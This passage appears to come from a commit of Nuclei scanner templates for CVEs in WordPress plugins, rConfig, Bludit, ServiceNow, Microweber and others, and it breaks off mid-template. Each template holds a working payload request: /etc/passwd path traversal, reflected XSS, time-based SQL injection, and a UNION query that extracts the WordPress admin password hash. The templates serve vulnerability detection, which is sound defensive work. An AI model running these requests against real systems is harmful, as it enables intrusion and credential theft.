- https://nvd.nist.gov/vuln/detail/CVE-2021-29006
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-29006
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2021,rconfig,authenticated,lfi
http:
- raw:
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /dashboard.php HTTP/1.1
Host: {{Hostname}}
- |
GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- 'root:.*:0:0:'
- type: word
part: body_2
words:
- 'rconfig'
- type: status
part: header_3
status:
- 200

53
http/cves/2021/CVE-2021-35323.yaml Normal file
View File

@ -0,0 +1,53 @@
id: CVE-2021-35323
info:
name: Bludit 3.13.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login
remediation: Bludit v4.0.0
reference:
- https://github.com/bludit/bludit/issues/1327
- https://nvd.nist.gov/vuln/detail/CVE-2021-35323
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-35323
cwe-id: CWE-79
metadata:
verified: true
shodan-query: title:"Bludit"
tags: cve,cve2021,bludit,xss
http:
- raw:
- |
GET /bludit/admin/login HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 10s
POST /bludit/admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "Bludit")'
condition: and
extractors:
- type: regex
name: tokenCSRF
part: body
group: 1
regex:
- 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"'
internal: true

47
http/cves/2022/CVE-2022-0228.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2022-0228
info:
name: Popup Builder < 4.0.7 - SQL Injection
author: r3Y3r53
severity: high
description: |
The Popup Builder WordPress plugin before 4.0.7 does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection.
remediation: update to v.4.0.7
reference:
- https://wpscan.com/vulnerability/22facac2-52f4-4e5f-be59-1d2934b260d9
- https://nvd.nist.gov/vuln/detail/CVE-2022-0228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cwe-id: CWE-89
cve-id: 2022-0228
cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
publicwww-query: "/wp-content/plugins/popup-builder/"
max-request: 1
tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,popup-builder
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 15s
GET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=7'
- 'status_code_2 == 200'
- 'contains_all(body_2, "first name", "last name", "email")'
- 'contains(content_type_2, "application/octet-stream")'
condition: and

44
http/cves/2022/CVE-2022-0533.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-0533
info:
name: Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.
remediation: upgrade to v.3.0.15
reference:
- https://wpscan.com/vulnerability/40f36692-c898-4441-ad24-2dc17856bd74
- https://nvd.nist.gov/vuln/detail/CVE-2022-0533
- https://vulners.com/cve/CVE-2022-0533
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
tags: cve,cve2022,xss,ditty,wp,wordpress,wpscan,wp-plugin,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains_all(body_2, "<img src onerror=alert(document.domain)>", "ditty")'
condition: and

52
http/cves/2022/CVE-2022-0651.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2022-0651
info:
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
author: theamanrawat
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
- https://nvd.nist.gov/vuln/detail/CVE-2022-0651
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0651
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
google-query: inurl:/wp-content/plugins/wp-statistics
tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp,wp-statistics
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(6)-'&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "application/json")
- contains(body, 'Visitor Hit was recorded successfully')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '_wpnonce=([0-9a-zA-Z]+)'
internal: true

40
http/cves/2022/CVE-2022-0658.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-0658
info:
name: CommonsBooking < 2.6.8 - SQL Injection
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.
remediation: Fixed in version 2.6.8
reference:
- https://wpscan.com/vulnerability/d7f0805a-61ce-454a-96fb-5ecacd767578
- https://wordpress.org/plugins/commonsbooking/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0658
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0658
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli
http:
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")'
condition: and

41
http/cves/2022/CVE-2022-0787.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2022-0787
info:
name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
remediation: Fixed in version 5.1
reference:
- https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
- https://wordpress.org/plugins/wp-limit-failed-login-attempts/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0787
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0787
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts
http:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(all_headers, "text/html")
- contains(body, 'iTotalDisplayRecords')
condition: and

51
http/cves/2022/CVE-2022-0814.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2022-0814
info:
name: Ubigeo de Peru < 3.6.4 - SQL Injection
author: r3Y3r53
severity: critical
description: |
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
reference:
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
- https://wordpress.org/plugins/ubigeo-peru/
remediation: Fixed in version 3.6.4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0814
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/ubigeo-peru/"
tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'idProv'
- 'idDist'
- 'distrito'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

42
http/cves/2022/CVE-2022-0899.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-2022-0899
info:
name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1
- https://nvd.nist.gov/vuln/detail/CVE-2022-0899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0899
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(/document.domain/)</script>")'
- 'contains(body_2, "All Snippets")'
condition: and

36
http/cves/2022/CVE-2022-2174.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2022-2174
info:
name: microweber 1.2.18 - Cross-site Scripting
author: r3Y3r53
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.
reference:
- https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2174
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174
- https://www.tenable.com/cve/CVE-2022-2174
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2022-2174
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,microweber,xss,unauth
http:
- method: GET
path:
- "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(body, "<script>alert(document.domain)</script>") && contains(body, "microweber")'
- 'contains(content_type, "text/html")'
condition: and

52
http/cves/2022/CVE-2022-25148.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2022-25148
info:
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
author: theamanrawat
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
- https://nvd.nist.gov/vuln/detail/CVE-2022-25148
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25148
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
google-query: inurl:/wp-content/plugins/wp-statistics
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 15s
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "application/json")
- contains(body, 'Visitor Hit was recorded successfully')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '_wpnonce=([0-9a-zA-Z]+)'
internal: true

51
http/cves/2022/CVE-2022-25149.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2022-25149
info:
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
author: theamanrawat
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
- https://nvd.nist.gov/vuln/detail/CVE-2022-25149
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25149
cwe-id: CWE-89
metadata:
max-request: 2
verified: true
publicwww-query: "/wp-content/plugins/wp-statistics/"
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 50s
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "application/json")
- contains(body, 'Visitor Hit was recorded successfully')
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- '_wpnonce=([0-9a-zA-Z]+)'
internal: true

35
http/cves/2022/CVE-2022-2535.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-2535
info:
name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
author: r3Y3r53
severity: Medium
description: |
The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
remediation: Fixed in version 1.6.2
reference:
- https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2535
cwe-id: CWE-639
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/"
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "searchwp-live-search-result")'
condition: and

45
http/cves/2022/CVE-2022-3142.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2022-3142
info:
name: NEX-Forms Plugin < 7.9.7 - SQL Injection
author: r3Y3r53
severity: high
description: |
The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
remediation: Fixed in version 7.9.7
reference:
- https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
- https://www.exploit-db.com/exploits/51042
- https://nvd.nist.gov/vuln/detail/CVE-2022-3142
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-89
cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
tags: cve,cve2022,wordpress,sqli,wp-plugin,wp,wpscan,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 30s
GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code_2 == 200'
- 'contains(body_2, "NEX-Forms")'
- 'contains(content_type_2, "text/html")'
condition: and

34
http/cves/2022/CVE-2022-3242.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2022-3242
info:
name: Microweber <1.3.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.
reference:
- https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/
- https://www.tenable.com/cve/CVE-2022-3242
- https://nvd.nist.gov/vuln/detail/CVE-2022-3242
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
tags: xss,cve,cve2023,microweber
http:
- method: GET
path:
- "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
condition: and

33
http/cves/2022/CVE-2022-34093.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2022-34093
info:
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
- https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-34093
cwe-id: CWE-79
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
metadata:
verified: true
tags: cve,cve2022,i3geo,xss
http:
- method: GET
path:
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
condition: and

33
http/cves/2022/CVE-2022-34094.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2022-34094
info:
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.
reference:
- https://github.com/edmarmoretti/i3geo/issues/5
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-34094
cwe-id: CWE-79
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
metadata:
verified: true
tags: cve,cve2022,i3geo,xss
http:
- method: GET
path:
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
condition: and

68
http/cves/2022/CVE-2022-39048.yaml Normal file
View File

@ -0,0 +1,68 @@
id: CVE-2022-39048
info:
name: ServiceNow - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.
reference:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892
- https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39048
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-39048
cwe-id: CWE-79
metadata:
max-request: 3
verified: true
shodan-query: http.title:"ServiceNow"
tags: cve,cve2022,xss,servicenow,authenticated
http:
- raw:
- |
GET /navpage.do HTTP/1.1
Host: {{Hostname}}
- |
POST /login.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do
- |
GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"'
- 'assessment_list.do'
condition: and
- type: word
part: header_3
words:
- 'text/html'
- type: status
part: header_3
status:
- 200
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"'
internal: true

40
http/cves/2022/CVE-2022-40032.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-40032
info:
name: Simple Task Managing System v1.0 - SQL Injection
author: r3Y3r53
severity: critical
description: |
SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.
reference:
- https://www.exploit-db.com/exploits/51273
- https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-40032
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40032
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
tags: cve,cve2022,simple-task,stms,sqli
http:
- raw:
- |
@timeout: 15s
POST /task/loginValidation.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 302'
- 'content_length == 0'
- 'contains(content_type, "text/html")'
condition: and

54
http/cves/2022/CVE-2022-40047.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2022-40047
info:
name: Flatpress < v1.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-40047
- https://github.com/flatpressblog/flatpress/issues/153
metadata:
max-request: 2
verified: true
shodan-query: http.html:"flatpress"
tags: cve,cve2022,flatpress,authenticated,xss
variables:
randstring: "{{to_lower(rand_base(16))}}"
http:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="user"
{{username}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="pass"
{{password}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="submit"
Login
------WebKitFormBoundary{{randstring}}--
- |
GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "flatpress")'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "onfocus=\"alert(document.domain)")'
condition: and

58
http/cves/2022/CVE-2022-4049.yaml Normal file
View File

@ -0,0 +1,58 @@
id: CVE-2022-4049
info:
name: WP User <= 7.0 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be
- https://wordpress.org/plugins/wp-user/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4049
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4049
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth
http:
- raw:
- |
GET {{path}} HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
